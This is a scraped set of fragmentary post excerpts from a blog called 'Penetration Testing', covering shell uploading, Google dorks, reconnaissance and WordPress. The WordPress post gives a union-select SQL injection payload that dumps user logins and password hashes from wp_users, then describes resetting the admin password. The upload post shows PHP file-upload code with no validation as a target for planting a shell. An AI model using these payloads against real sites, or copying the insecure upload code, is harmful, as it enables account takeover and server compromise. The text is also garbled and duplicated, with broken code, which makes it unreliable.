dr3dr3.mihanblog.com
Penetration Testing - Shell Uploading Posts
http://dr3dr3.mihanblog.com/post/category/16
How Bypass Security When Uploading a File. 1) Simple file upload form with no validation. Form enctype="multipart/form-data" action="uploader.php" method="POST". Input type="hidden" name="MAX_FILE_SIZE" value="100000" /. Choose a file to upload: input name="uploadedfile" type="file" / br /. Input type="submit" value="Upload File" /. Choose a file to upload:. $target_path = "uploads/";. $target_path = $target_path . basename($_FILES['uploadedfile']['name']);. Has been uploaded";. 2) Mime Type validation.
dr3dr3.mihanblog.com
Penetration Testing - How Bypass Security When Uploading a File
http://dr3dr3.mihanblog.com/post/35
How Bypass Security When Uploading a File. 1) Simple file upload form with no validation. Form enctype="multipart/form-data" action="uploader.php" method="POST". Input type="hidden" name="MAX_FILE_SIZE" value="100000" /. Choose a file to upload: input name="uploadedfile" type="file" / br /. Input type="submit" value="Upload File" /. Choose a file to upload:. $target_path = "uploads/";. $target_path = $target_path . basename($_FILES['uploadedfile']['name']);. Has been uploaded";. 2) Mime Type validation.
dr3dr3.mihanblog.com
Penetration Testing - Design a Nuke8.2 Website
http://dr3dr3.mihanblog.com/post/41
Design a Nuke8.2 Website.
dr3dr3.mihanblog.com
Penetration Testing - Hack Results Posts
http://dr3dr3.mihanblog.com/post/category/18
dr3dr3.mihanblog.com
Penetration Testing - Some Good Windows Software
http://dr3dr3.mihanblog.com/post/45
Some Good Windows Software. A Little PDF Reader.
dr3dr3.mihanblog.com
Penetration Testing - Footprinting & Reconnaissance Cheat Sheet
http://dr3dr3.mihanblog.com/post/42
Footprinting and Reconnaissance Cheat Sheet. 1) Server, OS and Domain Information. Try these Google dorks. http://www.exploit-db.com/google-dorks. If you can't find an administrator's contact details in domain registrations, you can try a typical administrator address. site:test.com "@gmail.com". Search for the target in forums and social media. 3) Jobs - just for companies. Find SQL injection queries. TRACERT www.site.com. In Linux - sudo traceroute -T www.site.com. Type nslookup in cmd and press enter.
dr3dr3.mihanblog.com
Penetration Testing - Best Tools Posts
http://dr3dr3.mihanblog.com/post/category/22
Some Good Windows Software. A Little PDF Reader.
dr3dr3.mihanblog.com
Penetration Testing - Google Dorks For WordPress Hacking
http://dr3dr3.mihanblog.com/post/38
Google Dorks For WordPress Hacking. Dork:"powered by WordPress" inurl:"/? 3 Now after 'id=' use the code which is given below. Null and 1=2 union select 1,concat( user login. 0x3a, user pass. 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2. 8 from wp users. Null and 1=2 union select 1,concat( user login. 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2. 8 from wp users. Now we just need to reset it. NOTE: Replace key= and login=. So my link will be:.
dr3dr3.mihanblog.com
Penetration Testing - Design Posts
http://dr3dr3.mihanblog.com/post/category/17
Design a Nuke8.2 Website. WordPress Codes - - - - - - - - - -. First install the cystats plugin. <?php cystats_countUsersOnline(); ?> <?php cystats_getSearchengineRefererCount($showmode=true); ?> Total number of posts: <?php cystats_countPosts(); ?> Number of links: <?php cystats_countLinks(); ?> <?php cystats_countVisits(today); ?> <?php cystats_countVisits(yesterday); ?> Visits this week: <?php cystats_countVisits(week); ?> Visits this month: <?php cystats_countVisits(month); ?> <?php cystats_countVisits(all); ?> <?php wp_get_archives(); ?>
dr3dr3.mihanblog.com
Penetration Testing - Installing LAMP(linux-apache-mysql-php) in Backtrack
http://dr3dr3.mihanblog.com/post/46
Installing LAMP(linux-apache-mysql-php) in Backtrack. For phpMyAdmin, first download the package. sudo apt-get install phpmyadmin. sudo svn checkout https://phpmyadmin.svn.sourceforge.net/svnroot/phpmyadmin/tags/STABLE/phpMyAdmin phpMyAdmin. sudo nano /etc/apache2/apache2.conf. sudo /etc/init.d/apache2 start.